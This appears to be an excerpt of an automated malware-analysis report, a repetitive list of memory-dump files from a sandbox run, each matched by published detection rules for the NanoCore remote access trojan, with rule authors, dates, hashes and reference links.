Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
